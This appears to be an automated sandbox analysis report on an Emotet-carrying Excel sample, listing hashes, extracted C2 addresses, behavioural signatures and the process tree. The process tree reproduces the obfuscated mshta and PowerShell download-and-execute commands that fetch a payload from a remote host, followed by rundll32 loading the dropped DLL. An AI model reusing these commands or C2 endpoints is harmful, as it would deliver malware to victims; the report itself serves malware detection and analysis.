Analysis
-
max time kernel: 129s
max time network: 151s
platform: windows10_x64
resource: win10-en-20211208
submitted: 19-01-2022 12:55
Behavioral task: behavioral1
Sample: c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls
Resource: win10-en-20211208
General
-
Target: c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls
Size: 142KB
MD5: 8d6b43ca03cf1e4d675a523c4b06e214
SHA1: 6cdde32cd5ce069e00c952575714e66c55f091cc
SHA256: c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94
SHA512: 600dc0d8cd18517e49c8319c8a7e9feb8cdd6354d80ff1c0b7e99ccdbd9fc3651b30c07448792fd7b52ec877068d72a2c664c2e79ca8fcdfd542ff6f1c8f7418
Malware Config
-
Extracted: http://0xb907d607/fer/fer.html
Extracted: http://185.7.214.7/fer/fer.png
Extracted: emotet
Epoch4
C2 addresses:
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1344 | 2840 | cmd.exe | EXCEL.EXE
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes: mshta.exe, powershell.exe, rundll32.exe
flow | pid | process
19 | 1880 | mshta.exe
20 | 3136 | powershell.exe
22 | 3136 | powershell.exe
45 | 3872 | rundll32.exe
46 | 3872 | rundll32.exe
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes: rundll32.exe, rundll32.exe
pid | process
2448 | rundll32.exe
2876 | rundll32.exe
-
Drops file in System32 directory 1 IoCs
Processes: rundll32.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Meylpseqyfafegq\ugxvewuet.fqp | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes: WerFault.exe
pid | pid_target | process | target process
2904 | 1880 | WerFault.exe | mshta.exe
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: EXCEL.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: EXCEL.EXE
pid | process
2840 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes: powershell.exe, WerFault.exe, rundll32.exe
pid | process
3136 | powershell.exe (x2)
2904 | WerFault.exe (x14)
3136 | powershell.exe (x1)
3872 | rundll32.exe (x2)
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, WerFault.exe
description | pid | process
Token: SeDebugPrivilege | 3136 | powershell.exe
Token: SeDebugPrivilege | 2904 | WerFault.exe
-
Suspicious use of SetWindowsHookEx 13 IoCs
Processes: EXCEL.EXE
pid | process
2840 | EXCEL.EXE (x13)
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes: EXCEL.EXE, cmd.exe, mshta.exe, powershell.exe, cmd.exe, rundll32.exe, rundll32.exe, rundll32.exe
description | pid | process | target process
PID 2840 wrote to memory of 1192 | 2840 | EXCEL.EXE | splwow64.exe (x2)
PID 2840 wrote to memory of 1344 | 2840 | EXCEL.EXE | cmd.exe (x2)
PID 1344 wrote to memory of 1880 | 1344 | cmd.exe | mshta.exe (x2)
PID 1880 wrote to memory of 3136 | 1880 | mshta.exe | powershell.exe (x2)
PID 3136 wrote to memory of 3920 | 3136 | powershell.exe | cmd.exe (x2)
PID 3920 wrote to memory of 2448 | 3920 | cmd.exe | rundll32.exe (x3)
PID 2448 wrote to memory of 2876 | 2448 | rundll32.exe | rundll32.exe (x3)
PID 2876 wrote to memory of 3884 | 2876 | rundll32.exe | rundll32.exe (x3)
PID 3884 wrote to memory of 3872 | 3884 | rundll32.exe | rundll32.exe (x3)
Processes
-
Tree depth in brackets; signatures triggered by each process follow its command line.
- [1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls"
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
  - [2] C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\mshta.exe
      Command line: mshta http://0xb907d607/fer/fer.html
      Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
        Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
          Signatures: Suspicious use of WriteProcessMemory
          - [6] C:\Windows\SysWow64\rundll32.exe
            Command line: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
            - [7] C:\Windows\SysWOW64\rundll32.exe
              Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
              Signatures: Loads dropped DLL; Drops file in System32 directory; Suspicious use of WriteProcessMemory
              - [8] C:\Windows\SysWOW64\rundll32.exe
                Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Meylpseqyfafegq\ugxvewuet.fqp",weNYz
                Signatures: Suspicious use of WriteProcessMemory
                - [9] C:\Windows\SysWOW64\rundll32.exe
                  Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Meylpseqyfafegq\ugxvewuet.fqp",DllRegisterServer
                  Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses
      - [4] C:\Windows\system32\WerFault.exe
        Command line: C:\Windows\system32\WerFault.exe -u -p 1880 -s 1664
        Signatures: Program crash; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
- C:\Users\Public\Documents\ssd.dll
  MD5: e02ff840694a513aa52f00a53cfaf993
  SHA1: eebde95c08ffdfad981141bc7ef512bba8830458
  SHA256: 15d66dc9c6ef28e9afc1fe9e5d79b94e6dd57fb030d7341fed2169b3af6da273
  SHA512: c9536b71712a38b550729617e1aa9be99d16a31ee272575e4b80d5f3fe45e701cbed5475177c4dea3e3e6e0ea2890687a31a71ebeecbe68bd8a923308ceeeb60
- \Users\Public\Documents\ssd.dll
  MD5: e02ff840694a513aa52f00a53cfaf993
  SHA1: eebde95c08ffdfad981141bc7ef512bba8830458
  SHA256: 15d66dc9c6ef28e9afc1fe9e5d79b94e6dd57fb030d7341fed2169b3af6da273
  SHA512: c9536b71712a38b550729617e1aa9be99d16a31ee272575e4b80d5f3fe45e701cbed5475177c4dea3e3e6e0ea2890687a31a71ebeecbe68bd8a923308ceeeb60
- memory/2840-128-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-117-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-116-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-129-0x00007FF7E1700000-0x00007FF7E1710000-memory.dmp  Filesize: 64KB
- memory/2840-115-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-866-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-865-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-864-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-863-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2840-127-0x00007FF7E1700000-0x00007FF7E1710000-memory.dmp  Filesize: 64KB
- memory/2840-118-0x00007FF7E4E20000-0x00007FF7E4E30000-memory.dmp  Filesize: 64KB
- memory/2876-816-0x0000000005180000-0x00000000051A6000-memory.dmp  Filesize: 152KB
- memory/2876-813-0x0000000005020000-0x0000000005046000-memory.dmp  Filesize: 152KB
- memory/2876-804-0x0000000002E60000-0x0000000002E86000-memory.dmp  Filesize: 152KB
- memory/2876-806-0x0000000002F70000-0x0000000002F96000-memory.dmp  Filesize: 152KB
- memory/2876-809-0x0000000004E20000-0x0000000004E46000-memory.dmp  Filesize: 152KB
- memory/2876-811-0x0000000004FC0000-0x0000000004FE6000-memory.dmp  Filesize: 152KB
- memory/3136-481-0x0000013A26030000-0x0000013A26052000-memory.dmp  Filesize: 136KB
- memory/3136-573-0x0000013A0C2E6000-0x0000013A0C2E8000-memory.dmp  Filesize: 8KB
- memory/3136-536-0x0000013A0C2E3000-0x0000013A0C2E5000-memory.dmp  Filesize: 8KB
- memory/3136-535-0x0000013A0C020000-0x0000013A0C2E2000-memory.dmp  Filesize: 2.8MB
- memory/3136-531-0x0000013A266C0000-0x0000013A26736000-memory.dmp  Filesize: 472KB
- memory/3136-500-0x0000013A262A0000-0x0000013A262DC000-memory.dmp  Filesize: 240KB
- memory/3872-818-0x0000000004830000-0x0000000004856000-memory.dmp  Filesize: 152KB
- memory/3884-815-0x00000000030D0000-0x00000000030F6000-memory.dmp  Filesize: 152KB